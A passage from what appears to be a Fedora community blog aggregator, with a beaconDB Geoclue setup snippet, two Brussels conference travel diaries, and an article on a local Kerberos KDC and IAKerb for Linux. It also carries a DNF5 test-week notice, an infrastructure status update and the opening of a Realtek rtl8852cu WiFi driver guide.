Although there are many possible MLS alternatives (As long as they maintain Ichnaea compatibiltiy), the main alternative those days is beaconDB.

To set up beaconDB set the URL to

https://api.beacondb.net/v1/geolocate
.

Or as adapted from their website:

$ sudo mkdir /etc/geoclue/conf.d
$ sudo nano /etc/geoclue/conf.d/99-beacondb.conf
[wifi]
enable=true
url=https://api.beacondb.net/v1/geolocate
$ sudo systemctl reload geoclue

After restarting Geoclue you should have access to beaconDB.

A future article will focus on submitting new data, this might require an Android phone.

Notes

  • If there’s not enough data for your region yet, you might not have a very good experience. Consider looking at the beaconDB map before making the switch or submitting data for your region.
  • The Geoclue integration with Wifi networks requires wpa_supplicant, since currently only a wpa_supplicant backend exists. This means iwd users won’t be able to use Geoclue correctly since there is no Geoclue iwd support and no Wifi data will be sent. Instead fall back to beaconDB’s GeoIP implementation will occur.
  • There is a chance beaconDB’s implementation of GeoIP might be potentially worse than Geoclue’s own implementation. This could be explained by geoclue currently relying on Google, although in the future it will switch to using reallyfreegeoip. This will be noticed if city-level locations are not precise, such as showing the location a few cities away from the user actual location.

Day One - CentOS Connect 2025

Posted by Akashdeep Dhar on 2025-02-09 18:30:00 UTC
Day One - CentOS Connect 2025

The first day of my presence at CentOS Connect 2025 began as early as 0600am Central European Time on 30th January 2025. As the first half of that day mostly consisted of some meetups from Hyperscale SIG, Alternative Images SIG, AlmaLinux Elevate and the OKD team, I decided that I would try to make it to the venue by 1100am Central European Time. I wanted to help with the organizational efforts of CentOS Connect 2025 and represent the Fedora Project community at the event venue. Sumantro Mukherjee and I headed down at around 0730am Central European Time for breakfast where we met with Greg Sutcliffe and Luis Bazan. Amidst all the wisecracking about Greg's pink-coloured water bottle, Justin W. Flory and Bhagyashree Padalkar joined us at the dining place to join Greg on their way to CHAOSScon EU 2025 at Bedford Hotels & Congress Centre.

Day One - CentOS Connect 2025
I found this in the elevator at the Moxy Brussels City Center hotel and it is as if that the selfie taking event was manifested by someone else

After a brief introduction with Bhagyashree before their departure, I realized that Greg had left his pink-coloured water bottle and sprinted outside to catch up with Greg who headed inside at the same time with the same realization. With the handover complete, I discussed the plans to head to the CentOS Connect 2025 event venue with Sumantro and Luis where Luis decided to head away in advance while the both of us decided to delay our departure by at least 0930am Central European Time. The shop that we were planning to visit during the first half of the day named Ichiban was opening at around 1000am Central European Time and was on the way between the event venue at DoubleTree by Hilton Brussels City and our hotel, Moxy Brussels City Center. We soon departed on bus number #71 bound for De Brouckère from a nearby bus stop and got off one stop before the designated point.

Day One - CentOS Connect 2025
What Sumantro and I thought would be a "quiet bus ride" ended up being a "quiet bus ride" to the destination - Sometimes boring is amazing

The rain that morning was a lot worse than the one that Sumantro and I experienced the previous night. While we previously were considering heading to the event venue on foot, we quickly decided to use a bus instead. On our way from the destination stop to the Ichiban store, we also passed through the Hotel Marivaux which we stayed at during my first trip to FOSDEM in 2023. We swiftly made it to the Ichiban store where Sumantro explored some Goku figurines from the Dragon Ball Z (1989) anime and I was finally able to find some Manga books in English. As the selection did not match my expectations, Sumantro and I decided to head out after purchasing a couple of imported merchandise from Japan like quaint-themed Fanta drinks and some Anime themed Sakuma Drops from the popular Naruto (2007) anime and acclaimed Ansatsu Kyoushitsu (2015) anime.

Some more walking through towards the event venue and we soon found ourselves around the DoubleTree by Hilton Brussels City hotel where CentOS Connect 2025 was organized. This was also the place that I was staying in to attend the FOSDEM fringe events in 2024 so I felt this sense of familiarity with the place. What helped with the familiarity more was the sight of Carl W. George and Dorka Volavkova at the CentOS Connect 2025 reception desk at around 1030am Central European Time. For Carl - going as far as hugging me when I was super soaked from rain was "no big deal" and it was indeed great meeting him after a long time. Sumantro and I got ourselves the event badges along with CentOS Project themed tee shirts while we were at the desk. While we were at the desk, I noticed the SyncStar postcards that I worked to design and Dorka helped with printing from Brno.

I was grateful that Dorka managed to get these resources printed when these were turned in late to her because of the delays due to the confusion around the availability of Fedora Project themed USB flash drives for giveaways. SyncStar is a service that I developed by taking inspiration from an existing but unmaintained tool called Fedorator to help with creating bootable media at conference kiosks. Although there was this one thing that I was bummed about and that was the fact the CentOS Project-themed USB flash drives that were being given away were manually flashed with the recently released CentOS Stream 10 when SyncStar could have easily been of help with making the process convenient. After all, SyncStar was nothing but a fancy wrapper around GNU DD with asynchronous process queues written in Python and a responsive web interface written in ReactJS.

Day One - CentOS Connect 2025
SyncStar postcards among USB flash drives with CentOS Stream 10 at the CentOS Connect 2025 event desk for the event attendees

After leaving my coat to dry in the Chestnut Hall, I ran into Brian Exelbierd who also seemed to have arrived around the same time. It was great catching up with him after a long time and after leaving the conversation to Sumantro, I started working on setting up the YAML file to configure the SyncStar utility at the reception desk. Carl and I struggled briefly with the hotel WiFi as I wanted my laptop to execute the service headlessly and Carl's laptop to exhibit the web interface before deciding to use Cloudflare Tunnels for the purpose. The final deployment was configured to be served through the Cloudflare network on the hostname syncstar.gridhead.net which surprised Carl as he thought that the hostname was limited to the local network only. I caught up with Shaun McCance as well following the conversations around their move to GitLab with Fabian Arrotin.

Day One - CentOS Connect 2025
Digital display of schedule for all the presentation events to take place on the second half of the first day of CentOS Connect 2025

Alongside the Fedora Project, the CentOS Project seemed to have also decided to move away from Pagure and hence, the assets on their current deployment of Package Sources and Project Collections had to be reliably exported over to GitLab. I maintained a project named Pagure Exporter for the Fedora Infrastructure team and I volunteered my support to help with the CentOS Project's migration from Pagure to GitLab. While my primary focus then was to introduce the support for Forgejo that the Fedora Council decided for the community to move over to - there was no need to reinvent the wheel with another project when the existing one could be extended. Once done with the exchange, I ran into Sherif Nagy and Neil Hanlon from the Rocky Enterprise Software Foundation and David Cantrell who represented the Fedora Engineering Steering Committee in the Fedora Council.

Purchasing an extra orange-flavoured Fanta soda can among other Japanese imported products at the Ichiban store earlier that morning was a wise thing to do as that ended up coming in handy when David mentioned his struggle with the caffeine intake since the morning. Saving him a trip downstairs for a purchase, I caught up in conversations with him when the both of us ran into Matthew Miller who had just arrived at the venue at around 0100pm Central European Time. After a small chat with him and Amy Marrich at the reception area, they left for a meeting with Shaun and Carl so I decided to help out with the event reception area with Dorka. She provided me with a swift and effective walkthrough of what had to be done and once I relocated my stuff to the cloakroom for event organizers and speakers, I started helping out with the event registrations there.

Dorka mentioned her plans to come to India for DevConf.IN in Pune - which was great because we were also planning on organizing a Fedora Project booth at the event. We were soon joined by Luis whose wisecracking kept things interesting as we were getting folks registered at the reception. Among some folks I helped register, I caught up with the likes of Alexandra Fedorova whom I was meeting after the previous Fedora Council F2F Meeting in 2024 and Fabio Valentini whom I was meeting for the first time. While getting David Fan and Jess Chitas registered, he mentioned liking my Instagram stories about my adventures through various anime stores in Brussels and planning on heading out together whenever after the event. At around 0130pm Central European Time, I decided to grab a Greek Bowl meal with chicken salad that was served for the lunch meal at the event venue.

Day One - CentOS Connect 2025
From left to right - Luis, Dorka and I goofing around at the CentOS Connect 2025 reception desk in the afternoon when we got some breathing room after the slight decrease in the entry footfall

Fabian arrived at CentOS Connect 2025 around the same time and I caught up with him, Frantisek Lachman and Alexandra in conversations who were present around the reception desk. At around 0200pm Central European Time, the presentations at the event began with an opening statement from Shaun - I started attending some talks while working on some recently noticed changes on the SyncStar project. The inexpensive USB flash drives used for the giveaways did not have unique hardware identifiers and hence, it was difficult to discern among multiple USB flash drives of the same type. Sumantro and I worked on brainstorming solutions (read as workarounds) with which we can retain the information about the USB flash drives plugged into the kiosk device, all while tuning into talks delivered by Troy Dawson, Dennis Gilmore and Joel Capitao in the Chestnut Hall.

At around 0500pm Central European Time, after spending some time brain storming and coming up with solutions that have some kind of compromises, Sumantro and I decided to call it a day and head back to the hotel. On our way out, we met up with Daniel Mellado and Mikel Olasagasti before we took a selfie with Alexandra, Brian and Dennis to close out the first day of CentOS Connect 2025. Coincidentally, we ran into Matthew and David at the dining area of the event venue so after waving David goodbye, the three of us "tailgated" our way out of the rear exit of the DoubleTree by Hilton Brussels City. On our way through the Rogier station to the train that we were supposed to catch for Port De Namur station, Sumantro and I discussed with Matthew about his tentative yet eager plans to visit India for the first time to represent the Fedora Project during DevConf.IN 2025.

Day One - CentOS Connect 2025
From left to right - (Neal Gompa, Richard Brown), Sumantro, myself, Alexandra and Brian in a selfie right before Sumantro and I were heading out of the event

We had a report of belongings being stolen from one of the Fedora Project community members during their travels so we took that as a learning to be extra careful about our surroundings whenever we were travelling in crowded trains like we did that time. After all, the last thing that you would want when you are travelling in a different country is for your important belongings like wallet, passport or smartphone to be stolen - I was worried about whoever was affected. After getting off at the Port De Namur station at around 0530pm Central European Time, we walked back to the Moxy Brussels City Center hotel. I connected with Matthew asynchronously after resting for a while and dropped a bag of Indian snacks in his hotel room about an hour later. As Sumantro was occupied with his work, I decided to head out alone to get a takeaway from the Belchicken outlet for dinner.

Day One - CentOS Connect 2025
You can clearly not have enough selfies with Sumantro, David and Matthew when you are at a community event with as much of a hustle and bustle as CentOS Connect 2025

I heard back from Amita Sharma on the way back to the hotel who was working with Rajan Shah for last minute approval on the Fedora Project booth so I knew that I had to start working on the planning as soon as possible. I had to ensure that I was ready with the statistical budget estimate for travel and accommodation for the representatives from the Fedora Project required for pulling off such an event. Imagine leading the planning of yet another Fedora Project event all while representing the community at the FOSDEM 2025 fringe - Talk about being crazy enough to take this up! As audacious of a plan as it was, I was able to get together an estimated action and projected estimate for the required budget on a document after I was swiftly done with my dinner. All I had to do next was to present this to Justin on the next day before reverting to Rajan and Amita with a confirmation.

Day One - CentOS Connect 2025
While the Rogier station looked empty in this photograph, it was about to get super crowded with people when we took the train number #6 to the Port De Namur station

Looking back at the situation I was dealt with late in the evening at around 0830pm Central European Time when I was almost out of my juice - one half of me wanted to call it a day while the other half of me wanted to push through with the planning. In hindsight - I am glad that the other half took precedence because I like to think that exemplary actions in exigent moments like these end up creating a difference in free and open source software communities. After messaging Justin to reserve some time from his busy schedule and checking with Dorka to see if we could get some assistance from her end, I took inputs on the budget from Samyak Jain who was available until late. At around 1000pm Central European Time, I decided to head to bed and use the next day to make the best use of the stakeholders present in person at the CentOS Connect 2025 event to progress the planning.

Local authentication hub

Posted by Alexander Bokovoy on 2025-02-09 11:00:00 UTC

FOSDEM 2025 is just behind us and it was a great event. I had a chance to talk about the local authentication hub project. The talk was well received and I got a lot of questions about the project. We ran Identity and Access Management devroom for the second time in row and it was a great success. I had two talks at the IAM devroom, both were process reports on the activity we have announced at FOSDEM 2024. Now that both recordings of the both talks published, I can share articles which go into more details.

Local authentication hub

Our FOSDEM talk is “localkdc - a general local authentication hub”. You can watch it and come back here for more details.

But before going into details, let me provide a bit of a background. It is 2025 now and we should go almost three decades back (ugh!).

History dive

Authentication on Linux systems is interwoven with the identity of the users. Once a user logged in, a process is running under a certain POSIX account identity. Many applications validate the presence of the account prior to the authentication itself. For example, the OpenSSH server does check the POSIX account and its properties and if the user was not found, will intentionally corrupt the password passed to the PAM authentication stack request. An authentication request will fail but the attempt will be recorded in the system journal.

This joint operation between authentication and identification sources in Linux makes it important to maintain a coherent information state. No wonder that in corporate environments it is often handled centrally: user and group identities stored at a central server and sourced from that one by a local software, such as SSSD. In order to consume these POSIX users and groups, SSSD needs to be registered with the centralized authority or, in other words, enrolled into the domain. Domain enrollment allows not only identity and authentication of users: both the central server and the enrolled client machine can mutually authenticate each other and be sure they talk to the right authority when authenticating the user.

FreeIPA provides a stable mechanism for building a centralized domain management system. Each user account has POSIX attributes associated with it and each user account is represented by the Kerberos principal. Kerberos authentication can be used to transfer the authentication state across multiple services and provides a chance for services to discover user identity information beyond POSIX. It also makes strong linking between the POSIX level identity and authentication structure possible: for example, a Kerberos service may introspect a Kerberos ticket presented by a user’s client application to see how this user was authenticated originally: with a password or some specific passwordless mechanism. Or, perhaps, that a client application performs operations on behalf of the user after claiming it was authenticated using a different (non-Kerberos) authentication.

Local user accounts’ use lacks this experience. Each individual service needs to reauthenticate a user again and again. Local system login: authenticate. Elevating privileges through SUDO? Authenticate again, if not explicitly configured otherwise. Details of the user session state, like how long this particular session is active, is not checked by the applications, making it also harder to limit access. There is no information on how this user was authenticated. Finally, overall user experience between local (standalone) authentication and domain-enrolled one differs, making it harder to adjust and educate users.

Local authentication is also typically password-based. This is not a bad thing in itself but depending on applications and protocols, worse choices could be made, security-wise. For example, contemporary SMB 3.11 protocol is quite secure if authenticated using Kerberos. For non-Kerberos usage, however, it is left to rely on NTLM authentication protocol which requires use of RC4 stream cipher. There are multiple attacks known to break RC4-based encryption, yet it is still used in majority of non-domain joined communications using SMB protocol simply because there was no (so far) alternative. To be correct, there was always an alternative, use of Kerberos protocol, but setting it up for individual isolated systems wasn’t practical.

The Kerberos protocol assumes the use of three different parties: a client, a service, and a key distribution center (KDC). In corporate environments a KDC is part of the domain controller system, a client and a service are both domain members, computers are enrolled in the domain. The client authenticates to KDC and obtains a Kerberos ticket granting ticket (TGT). It then requests a service ticket from the KDC by presenting its TGT and then presents this service ticket to the service. The service application, on its side, is able to decrypt the service ticket presented by the client and authenticate the request.

In the late 2000s Apple realised that for individual computers a number of user accounts is typically small and a KDC can be run as a service on the individual computer itself. When both the client and server are on the same computer, this works beautifully. The only problem is that when a user needs to authenticate to a different computer’s service, the client cannot reach the KDC hosted on the other computer because it is not exposed to the network directly. Luckily, MIT Kerberos folks already thought about this problem a decade prior to that: in 1997 a first idea was published for a Kerberos extension that allowed to tunnel Kerberos requests over a different application protocol. This specification became later known as “Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API” (IAKerb). An initial implementation for MIT Kerberos was done in 2009/2010 while Apple introduced it in 2007 to enable remote access to your own Mac across the internet. It came in MacOS X 10.5 as a “Back to My Mac” feature and even got specified in RFC 6281, only to be retired from MacOS in 2019.

Modern days

In the 2020s Microsoft continued to work on NTLM removal. In 2023 they announced that all Windows systems will have a local KDC as their local authentication source, accessible externally via selected applications through the IAKerb mechanism. By the end of 2024, we have only seen demos published by Microsoft engineers at various events but this is a promising path forward. Presence of the local KDC in Windows raises an interoperability requirement: Linux systems will have to handle access to Windows machines in a standalone environment over SMB protocol. Authentication is currently done with NTLM, it will eventually be removed, thus we need to support the IAKerb protocol extension.

The NTLM removal for Linux systems requires several changes. First, the Samba server will need to learn how to accept authentication with the IAKerb protocol extension. Then, Samba client code needs to be able to establish a client connection and advertise IAKerb protocol extension. For kernel level access, the SMB filesystem driver needs to learn how to use IAKerb as well, this will also need to be implemented in the user space cifs-utils package. Finally, to be able to use the same feature in a pure Linux environment, we need to be able to deploy Kerberos KDC locally and do it in an easy manner on each machine.

This is where we had an idea. If we are going to have a local KDC running on each system, maybe we should use it to handle all authentication and not just for the NTLM removal? This way we can make both the local and domain-enrolled user experience the same and provide access locally to a whole set of authentication methods we support for FreeIPA: passwords, smartcards, one-time passwords and remote RADIUS server authentication, use of FIDO2 tokens, and authentication against an external OAuth2 Identity Provider using a device authorization grant flow.

How “local” a local KDC should be?

On standalone systems it is often not desirable to run daemons continuously. Also, it is not desirable to expose these services to the connected network if they really don’t need to be exposed. A common approach to solve this problem is by providing a local inter-process communication (IPC) mechanism to communicate with the server components. We chose to expose a local KDC via UNIX domain sockets. A UNIX domain socket is a well-known mechanism and has known security properties. With the help of a systemd feature called socket activation, we also can start local KDC on demand, when a Kerberos client connects over the UNIX domain socket. Since on local systems actual authentication requests don’t happen often, this helps to reduce memory and CPU usage in the long run.

If a local KDC is only accessible over a UNIX domain socket, remote applications could not get access to it directly. This means they would need to have help from a server application that can utilize the IAKerb mechanism to pass-through the communication between a client and the KDC. It would enable us to authenticate as a local user remotely from a different machine. Due to how the IAKerb mechanism is designed and integrated into GSS-API, this only allows password-based authentication. Anything that requires passwordless methods cannot obtain initial Kerberos authentication over IAKerb, at least at this point.

Here is a small demo on Fedora, using our localkdc tool to start a local KDC, obtain a Kerberos ticket upon login. The tickets can then be used effortlessly to authenticate to local services such as SUDO or Samba. For remote access we rely on Samba support for IAKerb and authenticate with GSSAPI but local smbclient uses a password first to obtain the initial ticket over IAKerb. This is purely a limitation of the current patches we have to Samba.

Make a pause here and think about the implications. We have an initial Kerberos ticket from the local system. The Kerberos ticket embeds details of how this authentication happened. We might have used a password to authenticate, or a smartcard. Or any other supported pre-authentication methods. We could reuse the same methods FreeIPA already provides in the centralized environment.

The Kerberos ticket also can contain details about the user session, including up to date group membership. It does not currently have that in the local KDC case but we aim to fix that. This ticket can be used to authenticate to any GSS-API or Kerberos-aware service on this machine. If a remote machine accepts Kerberos, it theoretically could accept a ticket presented by a client application running on the local machine as well. Only, to do that it needs to be able to communicate with our local KDC and it couldn’t access it.

Trust management

Luckily, a local KDC deployment is a full-featured Kerberos realm and thus can establish cross-realm agreements with other Kerberos realms. If two “local” KDC realms have trust agreements between each other, they can issue cross-realm Kerberos tickets which applications can present over IAKerb to the remote “local” KDC. Then a Kerberos ticket to a service running on the target system can be requested and issued by the system’s local KDC.

Thus, we can achieve passwordless authentication locally on Linux systems and have the ability to establish peer to peer agreements across multiple systems, to allow authentication requests to flow and operate on commonly agreed credentials. A problem now moves to the management area: how to manage these peer to peer agreements and permissions in an easy way?

Systemd User/Group API support

MIT Kerberos KDC implementation provides a flexible way to handle Kerberos principals’ information. A database backend (KDB) implementation can be dynamically loaded and replaced. This is already used by both FreeIPA and Samba AD to integrate MIT Kerberos KDC with their own database backends based on different LDAP server implementations. For a local KDC use case running a full-featured LDAP server is not required nor intended. However, it would be great if different applications could expose parts of the data needed by the KDB interfaces and cooperate together. Then a single KDB driver implementation could be used to streamline and provide uniform implementation of Kerberos-specific details in a local KDC.

One of the promising interfaces to achieve that is the User/Group record lookup API via varlink from systemd. Varlink allows applications to register themselves and listen on UNIX domain sockets for communication similar to D-Bus but with much less implementation overhead. The User/Group API technically also allows to merge data coming from different sources when an application inquires the information. “Technically”, because io.systemd.Multiplexer API endpoint currently does not support merging non-overlapping data representing the same account from multiple sources. Once it would become possible, we could combine the data dynamically and may interact with users on demand when corresponding requsts come in. Or we can implement our own blending service.

Blending data requests from multiple sources within MIT KDC needs a specialized KDB driver. We certainly don’t want this driver to duplicate the code from other drivers, so making these drivers stackable would be a good option. Support for one level of stacking has been merged to MIT Kerberos through a quickly processed pull request and will be available in the next MIT Kerberos release. This allows us to have a single KDB driver that loads other drivers specialized in storing Kerberos principals and processing additional information like MS-PAC structure or applying additional authorization details.

Establishing trusts

If Alice and Bob are in the same network and want to exchange some files, they could do this using SMB and Samba. But that Alice can authenticate on Bob’s machine, they would need to establish a Kerberos cross realm trust. With the current tooling this is a complex task. For users we need to make this more accessible. We want to allow users to request trust on demand and validate these requests interactively. We also want to allow trust to be present for a limited timeframe, automatically expiring or manually removed.

If we have a Kerberos principal lookup on demand through a curated varlink API endpoint, we also can have a user-facing service to initiate establishing the trust between two machines on demand. Imagine a user trying to access SMB share on one desktop system that triggers a pop-up to establish trust relationship with a corresponding local KDC on the remote desktop system. Both owners of the systems would be able to communicate out of band that provided information is correct and can be trusted. Once it is done, we can return back the details of the specific Kerberos principal that represents this trust relationship. We can limit lifetime of this agreement so that it would disappear automatically in one hour or a day, or a week.

Current state of local authentication hub

We started with two individual implementation paths early in 2024:

  • support IAKerb in MIT Kerberos and Samba
  • enable MIT Kerberos to be used locally without network exposure

MIT Kerberos did have support for IAKerb protocol extension for more than a decade but since Microsoft introduced some changes to the protocol, those changes needed to be integrated as well. This was completed during summer 2024, though no upstream release is available yet. MIT Kerberos typically releases new versions yearly in January so we hope to get some updates early 2025.

Samba integration with IAKerb is currently under implementation. Originally, Microsoft was planning to release Windows 11 and Windows Server 2025 with IAKerb support enabled during autumn 2024. However, the Windows engineering team faced some issues and IAKerb is still not enabled in the Windows Server 2025 and Windows 11 releases. We are looking forward to getting access to Windows builds that enable IAKerb support to ensure interoperability before merging Samba changes upstream. We also need to complete the Samba implementation to properly support locally-issued Kerberos tickets and not only do acquisition of the ticket based on the password.

Meanwhile, our cooperation with MIT Kerberos development team led to advancements in the local KDC support. The MIT Kerberos KDC can now be run over a UNIX domain socket. Also on systemd-enabled systems we allow socket activation, transforming local KDC into an on-demand service. We will continue our work on a dynamic database for a local KDC, to allow on-demand combination of resources from multiple authoritative local sources (Samba, FreeIPA, SSSD, local KDC, future dynamic trust application).

For experiments and ease of deployments, a new configuration tool was developed, localkdc. The tool is available at localkdc and COPR repository can be used to try the whole solution on Fedora.

If you want to get that test tried in a simple setup, you might be interested in a tool that we developed initially for FreeIPA: FreeIPA local tests. This tool allows to provision and run a complex test environment in podman containers. The video of the local KDC usage was actually generated automatically by the scripts from https://github.com/abbra/freeipa-local-tests/tree/main/ipalab-config/localkdc.

Contribute to GNOME Software with DNF5 Test Day

Posted by Fedora Magazine on 2025-02-08 18:36:49 UTC

The DNF5 team is working on ironing out bugs around matching the existing functionality of GNOME Software with PackageKit. The DNF and QA teams have organized a test week from Monday,February 10, 2025 to Monday, February 17, 2025. The wiki page in this article contains links to the test images you’ll need to participate. Please continue reading for details.

How does a test week work?

A test week is an event where anyone can help ensure changes basic functionality of GNOME Software work well in an upcoming release. Fedora community members often participate, and the public is welcome at these events. If you’ve never contributed before, this is a perfect way to get started.

To contribute, you only need to be able to do the following things:

  • Download test materials, which include some large files
  • Read and follow directions step by step

The wiki page for the kernel test week has a lot of good information on what and how to test. After you’ve done some testing, you can log your results in the test week web application.

Happy testing, and we hope to see you on one of the test days.

Bits from early February 2025

Posted by Kevin Fenzi on 2025-02-08 16:58:43 UTC
Scrye into the crystal ball

Lets keep the blogging rolling. This week went by really fast, but a lot of it for me was answering emails and pull requests and meetings. Those are all important, but sometimes it makes it seem like not much was actually accomplished in the week.

riscv secondary koji hub

I got some x86 buildvm's setup. These are to do tasks that don't need to be done on a riscv builder, like createrepo/newrepos or the like. I'm still having a issue with auth on them however, which is related to the auth issue with the web interface. Will need to get that sorted out next week.

f42 branching day

Tuesday was the f42 branching day. It went pretty smoothly this cycle I think, but there's always a small number of things to sort out. It's really the most complex part of the release cycle for releng. So many moving parts and dispirate repos and configs needing changing. This time I tried to stay out of actually doing anything, in favor of just providing info or review for Samyak who was doing all the work. I mostly managed to do that.

Datacenter move

Planning for the datacenter move is moving along. I've been working on internal documents around the stuff that will be shipped after we move, and next week I am hoping to start a detailed plan for the logical migration itself. It's a pretty short timeline, but I am hoping it will all go smoothly in the end. We definitely will be in a better place with better hardware once we are done, so I am looking forward to that.

comments? additions? reactions?

As always, comment on mastodon: https://fosstodon.org/@nirik/113969409712070764

Shopping Spree Before FOSDEM 2025

Posted by Akashdeep Dhar on 2025-02-07 18:30:50 UTC
Shopping Spree Before FOSDEM 2025

The decision of arriving to Brussels a day before the FOSDEM 2025 fringe events began was a smart one as that not only allowed me to catch up on some sleep due to the major timezone shift I faced but also to connect with my fellow community members. While the jet lag did not hurt me as badly as it did the last few times I have been to Europe, I did find myself waking up a little earlier, at around 0500am Central European Time. After getting through some physical exercise in the morning routine, Sumantro Mukherjee got in touch with me to hatch some plans for exploring Brussels and purchasing goodies. We made it to the dining place around the reception area of the Moxy Brussels City Center hotel at around 0830am Central European Time to have our meal, which mostly consisted of Oatmeal Bars, Golden Hashbrowns, Chicken Sausage, Scrambled Eggs and Apple Juice.

Shopping Spree Before FOSDEM 2025
Light breakfast at Moxy Brussels City Center consisting of Oatmeal Bars, Golden Hashbrowns, Chicken Sausage, Scrambled Eggs and Apple Juice

Even though we were through with our breakfast by around 0900am Central European Time, we realized that most locations would not open before 1000am, and therefore, I decided to head back to my hotel room after waiting for Justin W. Flory for a while. I headed back down at around 0945am Central European Time, and with me gifting Justin a small bag of Vakadwadi snacks that he loved and sharing some conversation around the Fedora Mindshare revamp - Sumantro and I headed out on a shopping spree. Our first stop was a Kiko Milano outlet, where he made a couple of purchases for his wife before we crossed the road to make it to the ICI Paris XL outlet. After purchasing a couple of incense from there for my family members, we decided to head to a Primark store to pick up some clothes - only to find that we were probably one of their earliest customers.

Admittedly, we ended up picking up quite a lot of things from there, which made me wonder just how we would be able to carry them all back on our return trip. Sumantro was in constant touch with Saheli Das Mukherjee while I was connected with my uncle and my mother over call to ensure that we made some well-informed decisions on apparel sizes. We joined the queue one after the other once we were through with making our choices, and we decided that it would be for the best if we were to head back to the hotel to drop these things before we continued with further exploration. On our way out, we headed into a nearby video game store where we looked into a bunch of retro consoles, arcade cabinets and action figurines while discussing whether Sumantro should purchase an archaic Nintendo Game Boy Color and searching for some Genshin Impact official merchandise.

At around 1230pm Central European Time, we headed into an optometrist shop as Sumantro wanted to make a purchase of some shades from the acclaimed Versace brand as a gift for his wife. We headed into another video game store located beside the previous store, where we explored some more arcade cabinets, videogame cartridges, anime merchandise and archaic computers. We were sure that we were not going to make a purchase here anyway, so we decided to depart from there after obtaining a couple of energy drinks imported from Japan. In another computer peripheral store, Sumantro and I explored some transistor radios and feature phones that were going out of fashion swiftly before we realized that it was around time for us to head for lunch. Even though we initially planned to visit the Tintin store, we decided against it due to the lack of interest.

We found ourselves heading into a Belchicken joint at around 0200pm Central European Time, and after I made one more purchase of trenchcoat from a UNIQLO store, we decided to get a couple of takeaways. We elected a no-brainer combo of some Chicken Tenders and French Fries with Garlic Sauce and decided to have our food together in my hotel room #610. Sumantro left at around 0300pm Central European Time after we were through with the lunch for his hotel room as he wanted to prepare for his Fedora Mindshare part of the Fedora Council meeting that was going to happen in an hour from then. I decided to catch up on some more of the rest before joining the Fedora Council meeting remotely with other folks from the Red Hat Community Linux Engineering team, represented by Brendan Conoboy and those from the Fedora Council and CentOS Board.

In the evening, Sumantro made some impromptu plans to throw me a birthday party in the evening - which surely came as a welcome surprise to me. Among my thankful declination and his brotherly insistence, I had to give in, and we decided to leave from Moxy Brussels City Center hotel for Delirium Village at around 0600pm Central European Time. On our way out of the hotel, we ran into Matthew Miller and Luis Bazan, who were returning from their rental workspace - with whom we shared some conversations before we were on our way again. The weather was on the drizzlier side, and while we thought that it would get better in some time, we were soon proven wrong as we kept proceeding closer to the Grand Place. The Decathlon Forclaz jacket proved to be useful when the rain took a turn for the worse, and we had to stay moving constantly to ensure that we were not drenched.

After clicking a bunch of photographs around an absurdly vacant Grand Place square, we went through a row of memorabilia souvenir shops and luxury chocolate shops. While I could resist the temptation of making purchases from there as this was not my first time in Brussels, I could not help myself when I came across a conveniently tucked away Manga Cafe store when Sumantro and I were seeking shelter from the rain. The only reason why we could make it out was because of the distinctive Pikachu plushie and some Spy X Family posters visible from outside of the shop. Unlike the couple of shops that we visited earlier that day, this seemed like the place where we could find exactly what we were looking for - with the catch being that most merchandise available here, including the Genshin Impact Official Artbook, was localised to French, which was not helpful to me.

They had the entire manga collection of Horimiya (2021), which I would have purchased immediately had it been in English, but I did understand the reason why they were so. After spending almost an hour exploring the store until closing time of the store - I decided to get myself one unit of Kimetsu No Yaiba themed Sakuma Drops and three Gacha Boxes of metal plates with Spy X Family themed backgrounds. After clumsily dropping the cutter that I borrowed from the store receptionist a couple of times, I was finally able to pull plates with Loid Forger, Anya Forger and Yor Forger from the three boxes that I purchased. I wanted to buy out the entire stock to ensure that I ended up getting one of each kind possible from Spy X Family Code White (2023), but I decided not to go all out because that was most likely what the merchandise makers wanted us to do anyway.

Sumantro purchased a Daruma Doll after I dropped a lore about what they are about and a reference to those from the popular anime Doraemon (1979), and we departed from the store at around 0800pm Central European Time. We ordered a couple of beers when we made it into the hustle and bustle of the Delirium Cafe, and I decided to keep mine non-alcoholic to ensure that I was on top of my hydration game. The vibes within the Delirium Village were amazing, but as it was growing colder, we headed to The Belgian Fries Co. outlet for dinner once we were done with our drinks. We departed from the restaurant around an hour later for the hotel on foot, with me taking care of the navigation this time. We walked swiftly back to the hotel to ensure that we had enough resting time and woke up healthy to participate and assist with the CentOS Connect 2025 event the next day.

Linux Driver for RTL8832CU and RTL8852CU USB WiFi Adapters

Posted by Piju 9M2PJU on 2025-02-07 18:11:28 UTC

The rtl8852cu Linux driver (version 1.19.2.1, updated as of May 10, 2024) supports USB WiFi adapters based on the RTL8832CU and RTL8852CU chipsets. While Realtek continues to develop this out-of-kernel driver, it is important to note that it is not fully compliant with Linux Wireless Standards. This makes it more suitable for specialized use cases, such as embedded systems, rather than general desktop or server environments.

For most users, adapters with in-kernel drivers are recommended due to their stability and ease of use. However, if you’re working with an adapter supported by this driver, here’s everything you need to know.


Key Features of the rtl8852cu Driver

  • WiFi Standards: IEEE 802.11 b/g/n/ac/ax (WiFi 6)
  • Security Protocols:
  • WEP, WPA TKIP, WPA2 AES/Mixed mode (PSK and TLS)
  • WPA3-SAE R2
  • WPS (PIN and PBC methods)
  • Modes Supported:
  • Client mode
  • AP mode (with DFS channel support)
  • P2P-client and P2P-GO
  • IBSS (not tested)
  • Advanced Features:
  • Miracast
  • WiFi-Direct
  • Wake on WLAN
  • VHT and HE control (supports 160 MHz channel width in AP mode)

Note: Monitor mode is not supported. If you require monitor mode, consider adapters based on the mt7610u, mt7612u, or mt7921au chipsets.


Compatible Devices and Chipsets

This driver supports a variety of USB WiFi adapters, including:

  • Edup AX5400 EP-AX1671 (single-state, no onboard Windows driver)
  • Brostrend AX8
  • TP-Link Archer TX50UH V1
  • TP-Link Archer TXE70UH(EU) V1
  • MSI AXE5400

Warning: Multi-state adapters (those with internal Windows drivers) may cause issues on Linux. For better compatibility, opt for single-state and single-function adapters. Avoid multi-function adapters (e.g., those combining WiFi and Bluetooth).


Supported CPU Architectures and Kernels

  • CPU Architectures:
  • x86, i386, i686
  • x86-64, amd64
  • armv6l, armv7l (arm)
  • aarch64 (arm64)
  • Kernel Versions:
  • Officially tested: 5.4 to 6.6 (Realtek)
  • Community-supported: 6.7 to 6.12

Tested Compilers: gcc 12, 13, and 14.


Installation Guide

Prerequisites

Before installing the driver, ensure your system is up-to-date and has the necessary development tools installed. You’ll also need internet access during installation.

  1. Update Your System:
  • For Debian-based distributions (e.g., Ubuntu, Kali):
